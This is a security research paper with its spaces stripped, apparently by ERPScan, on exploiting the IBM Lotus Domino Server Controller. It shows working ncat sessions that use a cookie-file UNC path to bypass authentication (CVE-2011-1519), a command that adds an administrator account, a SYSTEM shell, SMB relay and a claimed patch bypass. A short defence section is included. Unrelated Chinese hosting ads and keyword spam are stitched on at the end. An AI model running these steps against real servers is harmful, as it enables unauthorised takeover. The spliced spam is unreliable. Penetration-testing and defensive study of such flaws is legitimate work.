LotusDomino:PenetrationThroughtheControllerAlexeySintsovERPscanCompanyEmail:a.
sintsov@erpscan.
comTwitter:@asintsovwww.
erpscan.
comwww.
dsecrg.
comERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com2ContentIntroduction3Stage1:Searchingatarget4Stage2:Chooseofbug5Stage3:Consoleprotocolresearch6Stage4.
ExploitforZDI-‐11-‐110.
10Stage5.
RequiemonSMB.
Exploit2.
12Stage6.
Exploitfor0day.
13Internet16HowtodefendLotusDominoConsole18Conclusions19Links20AboutAuthor21AboutDSecRGResearchcenterofERPScan22AboutERPScan23Th4nkZ24ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com3IntroductionIBMLotusDominoServertheapplicationserverwithdifferentservicessuchasmailserver,databaseserver,httpserverandothers.
InthisarticlewewilltalkaboutLotusDominoServerControllerthatgivescontrolovertargetserver.
Thisserviceismostcritical,soit'sanimportanttarget.
ThispapperdoesnotdescribeallpossiblevulnerabilitiesandmisconfigurationsofLotusDomino.
ItshowsfewofthepossiblewaystoattackLotusDominoandgetaccesstotheOS.
ThedocumentismeanttodrawattentiontothetypicalproblemsoftheDominoServerControllersecurity.
AlltestshavebeenperformedinLotusDomino8.
5.
2and8.
5.
3onOSWindows.
Whiledoinginternalpen-‐test(sometimesandwhiledoingexternaltoo),youmayfindinterestservice–LotusDominoServerController.
ThisisJAVAbasedapplicationthatgivestoadministratorremotecontroloverDominoserver.
ForusingthisserviceadministratorcanuseLotusDominoConsoleApplication.
Butforaccesstothisserviceyouneedtoknowloginandpassword.
Thisisprettystandardserviceandyoucanfounditifonlynetworkadministratordoesn'tfilterTCPportofthis.
Itisagoodtargetforanattackerorpenetrationtester,becausethisservicegivescontrolnotonlyforDominoServerbutalsocangiveaccesstoOSofserverwithrightsoftheprocessaccount.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com4Stage1:SearchingatargetIBMLotusDominoServerControlleruses2050/tcpportandSSLprotocolforencryptingdataandauthenticateserver.
Soinmostcasesfordetectingthisserviceyouneedtouseanynetworkscanners,likenmap:Nmap–sV192.
168.
0.
0/24–p2050Nmapscanreportfortargethost(192.
168.
0.
13)Hostisup(0.
0010slatency).
PORTSTATESERVICEVERSION2050/tcpopenssl/dominoconsoleLotusDominoConsole(domain:testdomain;description:"DSECRG")MACAddress:00:1A:1B:8A:5F:0E(HewlettPackard)ServiceInfo:OS:Windows/Longhorn/646.
1ThisresulttellsusnotonlyaboutLotusbutalsoaboutOSversion,itmaybeusefulforanyexploits,forexampleifwetalkaboutLotusDomino8.
5.
2FP2CVE-‐2011-‐0915(privateexploitexists),CVE-‐2011-‐0913(privateexploitexist)andCVE-‐2011-‐0914.
Thisexploitsuse"bufferoverflow"errorstoexecutearbitrarycode,butformostcases,especiallyforpenetrationteststhistypesofexploitscanbedangerous(sothisiswhyweneedtoknowOSversion).
Ifwewanttomakepenetration,wecantotryresearchthisbugsandreproduceexploits,butittakestime.
Ithink,mostclientsdonotunderstandpen-‐tester,ifhespendallhistimeofworkonexploitdevelopment(andfinallycrashtheservice…).
Ofcause,wecanbuyprivateexploit,butit'stakesmoney.
ButalsothisversionofLotusisvulnerabletoCVE-‐2011-‐1519(privateexploitexists).
Andlookslikeitissdesignerror…IlikedesignerrorsbecauseitiseasytoexploitandwecanexploititwithoutriskofDoS.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com5Stage2:ChooseofbugSowereproduceCVE-‐2011-‐1519detailshere[1]:TheremoteconsoleintheServerControllerinIBMLotusDomino7.
xand8.
xverifiescredentialsagainstafilelocatedataUNCsharepathnamespecifiedbytheclient,whichallowsremoteattackerstobypassauthentication,andconsequentlyexecutearbitrarycodebyplacingthispathnameintheCOOKIEFILEfield.
NOTE:thismightoverlapCVE-‐2011-‐0920.
ThisvulnerabilitywasfoundbyPatrikKarlssonanddisclosedbyTippingPointZDI[2].
Therearenomoredetails.
Soweneedtomakemoreresearchesforexploitingthisbug.
Itislookslikedonottakesalotoftimeforresearch(ControllerisJAVAbasedapplicationeasytodecompile)andmainthing:thisbuggivesremotecodeexecution.
Idealweaponforanypen-‐tester!
So,let'go…ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com6Stage3:ConsoleprotocolresearchFirstofallit'simportanttounderstandhowprotocolreallyworksandwhatisitsformatandetc.
Someinformation(simpleauth.
Processwithoutcookies)wecangetfromPatrik'sNSEscriptsfornmap,butforfullpicture(especiallyhowcookiefileprocessingworks)wecangetonlybydecompilingJavaclassforconsole.
ThisfilecanbefoundinLotusDominodistributivebyfollowingthepath:C:\ProgramFiles\IBM\Lotus\Domino\Data\domino\java\dconsole.
jar.
ThisJARisusedforboth:clientandserverside,soherewecanfindallneededinformation.
Let'sdecompileit,andfindcodethathandlesclientauthentication:function'run()'inNewClient.
class.
HereIgivesomecodethatIgotwithhelpofDJdecompiler[3],withmycomments://s1stringwithinputfrom2050/tcpif(s1.
equals("#EXIT"return2;CUTif(s1.
equals("#APPLET"))return6;if(s1.
equals("#COOKIEFILE"))if(stringtokenizer.
hasMoreTokens())cookieFilenamenextwordafter#COOKIEFILEcookieFilenamestringtokenizer.
nextToken().
trim(return7;if(!
1.
equals("#UI"))if(stringtokenizer.
hasMoreTokens())usrlogin,nextworduntilusrstringtokenizer.
nextToken(",").
trim();if(usrnull)return4;if(stringtokenizer.
hasMoreTokens())pwdpasswordpwdstringtokenizer.
nextToken().
trim();return0;CUTERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com7Thispartofcode(ReadFromUser()function)describesmaintokensandcommands'format,itisveryhelpful!
Let'sseenextpartofcode:/*loopwhilereadinginput*/doResultofreadinginputintovariable'i'intiReadFromUser(if(i6)//if#APPLETappletConnectiontrue;continue;CUTfindusernameinadmindata.
xmlandetcuserinfoUserManager.
findUser(usr);if(userinfonull)usernamenotfoundWriteToUser("NOT_REG_ADMIN");continue;if(!
appletConnection)//if#APPLETwasbefore.
.
.
without#APPLET,standardauth.
.
.
flagvrfyPwd.
verifyUserPassword(pwd,userinfo.
userPWD());else//Checkloginandpassword(APPLETMODE)BUGISHERE!
flagverifyAppletUserCookie(usr,pwd)if(flag)//IfAUTHdoneWriteToUser("VALID_USER");ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com8elseifnopeWriteToUser("WRONG_PASSWORD");while(true);//endloopif(flag)Ifauth.
succsessGetLotusDominoconsoletoauth.
userSo,nowweknow,thatforauthenticationwithcookiefileweneedtouse#APPLETtokenbefore#UI,thencheckingpasswordwillbedonenotbyverifyingUserPassword(pwd,userinfo.
userPWD())butbyverifyingAppletUserCookie(usr,pwd),where'usr'isinputtedusernameand'psw'inputtedpassword.
Let'sseehowverifyingofAppletUserCookie()works://cookieFilenamenexttokenreadafter#COOKIEFILEif(cookieFilenamenullcookieFilename.
length(0)returnflag;//UNCbughere!
FilefilenewFile(cookieFilename)intiint)file.
length();charac[newchar[i1];inputstreamreader.
read(ac,0,i);//s7stringbufferwithdatafromcookiefileStrings7newString(ac)doif((js7.
indexOf("SavethisfileonSMBsharedresource,forexampleonpublicfileserverorcreatesharedresourceonyourworkstationdependsfromfilterrulesinnetwork.
Forexamplewesavedthisfilebythispath:\\fileserver\public\cookie.
xmlNowwecandotheattack.
Weneedjustncatforthat.
DonotforgettorunitwithSSLsupport:ncatssltragetlotus2050#API#APPLET#COOKIEFILE\\fileserver\public\cookie.
xml#USERADDRESSdsecrg#UIusr,pswVALID_USER#EXITLOADCMD.
exe/Cnetuseraddusernamepassword/ADDBeginDataBeginDataCommandhasbeenexecutedonremoteserver.
Use'Live'consoleoptioninfuture,toviewresponsefromserver.
EndDataEndDataERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com11"#APPLET"commandtellserverthatwewantusecookiefileforauthentication.
So,whenwestartauthenticationprocessby"#UI"command,servertriestoopenfilethatwepointby"#COOKIEFILE"andusepasswordfromit.
After"#EXIT"commandClientinterfacewillbestartedandyoucanexecutecommands,forexamplebyusingoldgoodLOADcommand[4].
BydefaultyouwillgetJavainterface,soweneedtousepureAPI,withoutJavaoutput.
Forthisyouneedtouse"#API"before"#EXIT".
Commandwillbeexecuted,butwecan'tseeoutput.
Butifadministratorsetsecureconsoleoption(thatisrecommendationinZDIadvisoryforthisbug!
),wecan'tuseLOADorTELLcommands.
Butifouruserhasenoughprivileges,wecangetshellbyusingncatssltragetlotus2050#API#APPLET#COOKIEFILE\\fileserver\public\cookie.
xml#USERADDRESSdsecrg#UIusr,pswVALID_USER#EXIT$whoamiwhoamiBeginDataMicrosoftWindows[Version6.
1.
7601]Copyright(c)2009MicrosoftCorporation.
Allrightsreserved.
C:\Lotus\Domino\data>whoamiNTAUTHORITY\SYSTEMC:\Lotus\Domino\data>Theseprivilegesarenotsetbydefaults,butiftheyareset,wecanexecutesystemcommandswithoutLOADandTELLevenifconsoleisprotectedby'SetSecure'options.
Ifyouwanttochecktheseprivileges,youshouldopenadmindata.
xmlandcheckfortag,ifthereis4,25or26numbersintheline,itmeansthatprivilegesareset.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com12Stage5.
RequiemonSMB.
Exploit2.
Ok,nowwecanexploitthisissuewith'SetSecure'options.
ButwhatwecandoifwehavenotenoughprivilegesforexecutingsystemcommandstooDonotgiveup!
JustrememberaboutSMBRelay[5].
Ofcourse,ifwecanuseUNCasapathtothecookiefile,itisnormal,thatLotusservertriestomakeNTLMauthenticationonevilhost.
IfLotusServerrunswithdomainaccountthathaslocaladministratorsprivilegesorthesameaccountusedinanotherserver(reserveserver,foranexample)wecanuseSMBRelayattack.
Itisveryeasybyusingmeatsploitmodule,soIwillnottalkaboutitanymore.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com13Stage6.
Exploitfor0day.
NowfewwordsaboutfixinLotusDomino8.
5.
3:IBMjustaddbeforeanyCOOKIEFILEinput,sonowitwillbenot'\\evil\cookie\file'but'.
\\evil\cookie\file'Sowecan'tuseSMBshares.
Also,IBMaddsSSLclientauthenticationtotheconsoleserver.
SonowweneedtohavevalidSSLclient'scertificatebeforeconnectto2050.
Additionalproblem:evenwhenpatchisnotinstalleditisnotalwayspossibletouseUNCiftargetserverisinanothernetworkssegmentand/orSMBprotocolsarefiltered.
ForexampletargetserverisinanothercompanyfilialorintheInternet.
Inthiswaytargetservercan'tconnectbySMBtoyourSMBresource.
Patchbypass:Problemisinownpseudo-‐XMLparser,thatIBMwroteforparsingCOOKIEFILE.
Theformatofcookiefilemustbe(inidealworldofXML):Butinreal,when'XML'parserhandlescookiefile,ittriestofind"404NotFound2011-‐08-‐2209:19:1610.
10.
10.
1014613010.
10.
9.
947001400BadRequestItisimportanttomaketwoHTTPrequests,becauseweneedtohave'space'byteafter'functiononLoadConsole(){alert("Connected");}Inthis'exploit'wejustusedcosole.
jarbecauseofvalidcertificatesinit,soservercontrollercanauthenticateusbyourcertificateandwecanandspoofpathtocookiefilewithinjected'XML'.
Andmoreapplettakehostaddresfromcodebase,soyouneedtouseport-‐forwardingfrom127.
0.
0.
1:2050toremote_target:2050.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com16InternetJustsomescreenshot.
.
.
forfun…Pic1.
VulnerableLotusDominoControlleron.
GOVPic2.
DefaultSSLcert.
on.
GOVERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com17ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com18HowtodefendLotusDominoConsoleFirstofall,thisserviceisforadminsonly,soyoushouldcreaterulesonfirewallandfilteroutthisTCPport2050.
Secondthingthatyoushoulddoistoinstallpatches.
Butthisisnotall.
DonotforgetaboutconsolepasswordthatcanbesetandwillhelptopreventfromusingdangerouscommandslikeLOADandTELL.
Andfinallyitwouldbegreattoauditadmindata.
xmlfilesonsimplepasswords(hash)andprivilegesthatusershave.
TheseareminimumactionsthatcansaveyourLotusserver.
Ofcourse,youshouldalsocheckprocessaccountinOS,andfilterotherprotocolslikeSMBifitisnotnecessaryforbusiness.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com19ConclusionsFinallywehavefewwaystoexploitthisbug(ZDI-‐11-‐110)fordifferentcases,evenifpatchfromIBMisinstalled,soitisbecome0dayagain!
Alsowegetnewexploitforpen-‐testersthatcanbeeasilyusedinarealprojectandgiveniceresults.
Ihopethisarticlecouldbehelpfulforpenetrationtesters.
AttheendIwanttosayTHANKStoZDIteamandPatrikKarlssonforthebeautifulbug!
BestRegards.
AlexeySintsovERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com20Links[1]http://cve.
mitre.
org/cgi-‐bin/cvename.
cginame=CVE-‐2011-‐1519[2]http://www.
zerodayinitiative.
com/advisories/ZDI-‐11-‐110/[3]http://www.
neshkov.
com/dj.
html[4]http://dsecrg.
com/pages/pub/show.
phpid=24[5]http://dsecrg.
blogspot.
com/2011/01/new-‐blog-‐section-‐passthehash-‐bible.
htmlERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com21AboutAuthorAlexeySintsovMorethen10yearsinITsecurityarea.
CurrentlyworkintheleadingITsecuritycompanyERPScanasdirectorofISauditdepartment.
AlexeyisoneofthemainsecurityresearchersinDSecRG(DigitalSecurityResearchGroup).
OrganizerofRussianDefconGroup(DCG#7812).
HealsowritearticlesforRussianITsecuritymagazine'XAKEP'andmakepresentationsonconferences(CONFidence,HackInTheBox,ZeroNights,ChaosConstruction,PCIDSSRussiaandothers).
Hispublicworks:http://www.
exploit-‐db.
com/author/a=549ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com22AboutDSecRGResearchcenterofERPScanDSecRGLeadingSAPAGpartnerindiscoveringandsolvingsecurityvulnerabilities.
ERPScanexpertiseisbasedonresearchconductedbytheDSecRGresearchcenterasubdivisionofERPScancompany.
ItdealswithvulnerabilityresearchandanalysisinbusinesscriticalapplicationsparticularlyinSAPandpublisheswhitepapersaboutit.
SAPAGgivesacknowledgementsforsecurityresearchersfromDSecRGalmosteverymonthontheirsite.
NowDSecRGexpertsareonthefirstplaceinSAPpublicacknowledgementschart.
DSecRGexpertsarefrequentspeakersinprimeInternationalconferencesheldinUSA,EUROPE,CEMEAandASIAsuchasBlackHat,HITB,SourceBarcelona,DeepSEC,Confidence,Troopers,T2,InfoSecurity.
DSecRGresearchersgainmultipleacknowledgementsfrombiggestsoftwarevendorslikeSAP,Oracle,IBM,VMware,Adobe,HP,Kasperskiy,Apache,Alcatelandothersforfindingvulnerabilitiesintheirsolutions.
DSecRGhashigh-‐qualifiedexpertsinstaffwhohaveexperienceindifferentfieldsofsecurity,fromWebapplicationsandreverseengineeringtoSCADAsystems,accumulatingtheirexperiencetoconductresearchinSAPsystemsecurity.
E-‐mail:info@dsecrg.
comWeb:www.
dsecrg.
comERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com23AboutERPScanERPScanisaninnovativecompanyengagedintheresearchofERPsecurityanddevelopsproductsforERPsystemsecurityassessment.
Apartfromthisthecompanyrendersconsultingservicesforsecureconfiguration,developmentandimplementationofERPsystems,andconductscomprehensiveassessmentsandpenetrationtestingofcustomsolutions.
Ourflagshipproductsare"ERPScanSecurityScannerforSAP"andservice"ERPScanOnline"whichcanhelpcustomerstoperformautomatedsecurityassessmentsandcompliancechecksforSAPsolutions.
Contact:info[at]erpscan[dot]comhttp://www.
erpscan.
comERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com24Th4nkZJustagainandmore:PatrikKarlssongoodjobasalways!
AlexandrMinojenko[DSecRG]–fortipsandadvises.
AlexandrPolyakov[DSecRG]–forthetemplate8)Thankstoallmyteam:Alexey"GreenDog"Tyurin,GlebCherbov,DmitryChastuhin,DmitriEvdokimovAndalsooneDisRespecttoRuslanKarmanov(heisrudeguy,don'tlikehim)
pigyun怎么样?PIGYun成立于2019年,2021是PIGYun为用户提供稳定服务的第三年,期待我们携手共进、互利共赢。PIGYun为您提供:香港CN2线路、韩国CN2线路、美西CUVIP-9929线路优质IaaS服务。月付另有通用循环优惠码:PIGYun,获取8折循环优惠(永久有效)。目前,PIGYun提供的香港cn2云服务器仅29元/月起;韩国cn2云服务器仅22元/月起;美国CUVI...
阿里云(aliyun)在这个月又推出了一个金秋上云季活动,到9月30日前,每天两场秒杀活动,包括轻量应用服务器、云服务器、云数据库、短信包、存储包、CDN流量包等等产品,其中Aliyun轻量云服务器最低60元/年起,还可以99元续费3次!活动针对新用户和没有购买过他们的产品的老用户均可参与,每人限购1件。关于阿里云不用多说了,国内首屈一指的云服务器商家,无论建站还是学习都是相当靠谱的。活动地址:h...
麻花云在7月特意为主机测评用户群定制了促销活动:香港宽频CN2云服务器、安徽移动云服务器(BGP网络,非单线,效果更好)、安徽移动独立服务器、安徽电信独立服务器,全部不限制流量,自带一个IPv4,默认5Gbps的DDoS防御。活动链接:https://www.mhyun.net/act/zjcp特价云服务器不限流量,自带一个IPv4,5Gbps防御香港宽频CN2全固态Ⅲ型 4核4G【KVM】内存:...
404notfound为你推荐
郭吉军郭吉军和管鹏这两个站长怎么样?群里有人骂邮箱打不开怎么办我的邮箱打不开怎么办快速美白好方法有什么快速美白的好办法吗?中国论坛大全天涯论坛的网址?依赖注入请问下依赖注入的三种方式的区别网站联盟怎样进入网站联盟天天酷跑刷金币天天酷跑怎么刷金币?vbscript教程vbs 学习方法以及 vbs 实例 有编程基础ios7固件下载ios7发布当天是否有固件下载怎么升级ios6苹果6怎么升级最新系统
个人域名备案 a5域名交易 a2hosting 精品网 permitrootlogin 免费个人网站申请 150邮箱 asp免费空间申请 徐正曦 中国电信测网速 泉州移动 phpmyadmin配置 qq对话框 河南移动网 最好的qq空间 昆明蜗牛家 t云 服务器是干什么用的 备案空间 数据库空间 更多